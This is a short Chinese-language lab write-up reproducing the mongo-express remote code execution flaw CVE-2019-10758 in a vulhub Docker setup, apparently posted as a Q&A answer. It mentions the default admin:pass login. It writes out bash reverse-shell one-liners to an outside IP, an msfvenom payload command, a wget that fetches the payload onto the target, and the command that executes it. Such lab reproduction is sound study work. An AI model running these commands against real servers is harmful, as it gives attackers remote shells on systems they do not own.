mongo-express是一款mongodb的第三方Web界面,使用node和express开发。如果攻击者可以成功登录,或者目标服务器没有修改默认的账号密码(admin:pass),则可以执行任意node.js代码。[1]
ailx10
网络安全优秀回答者
网络安全硕士
去咨询
前提:准备好docker环境,下载好vulhub,进入目录 ,开始复现漏洞
docker-compose build //可选docker-compose up -d完成试验后,记得删除漏洞环境哦~~
docker-compose downdocker system prune -a -f //可选简单访问一下,说明mongo-express 远程代码执行漏洞(CVE-2019-10758)环境搭建成功了
反弹shell无效的语句
bash -c 'bash -i >& /dev/tcp/174.137.58.6/8888 0>&1'bash -c $@|bash 0 echo bash -i >&/dev/tcp/174.137.58.6/8888 0>&1只能靠文件上传了,先准备好反弹shell文件
msfvenom -p cmd/unix/reverse_python LHOST=174.137.58.6 LPORT=8888 -f raw > ailx10.py通过BurpSuite构造请求,让靶机主动下载反弹shell文件
wget http://174.137.58.6:7777/ailx10.py -O /tmp/shell再次通过BurpSuite构造请求,让靶机主动执行反弹shell
bash /tmp/shell见证奇迹的时刻到了,反弹shell成功
参考^mongo-express 远程代码执行漏洞(CVE-2019-10758) https://vulhub.org/#/environments/mongo-express/CVE-2019-10758/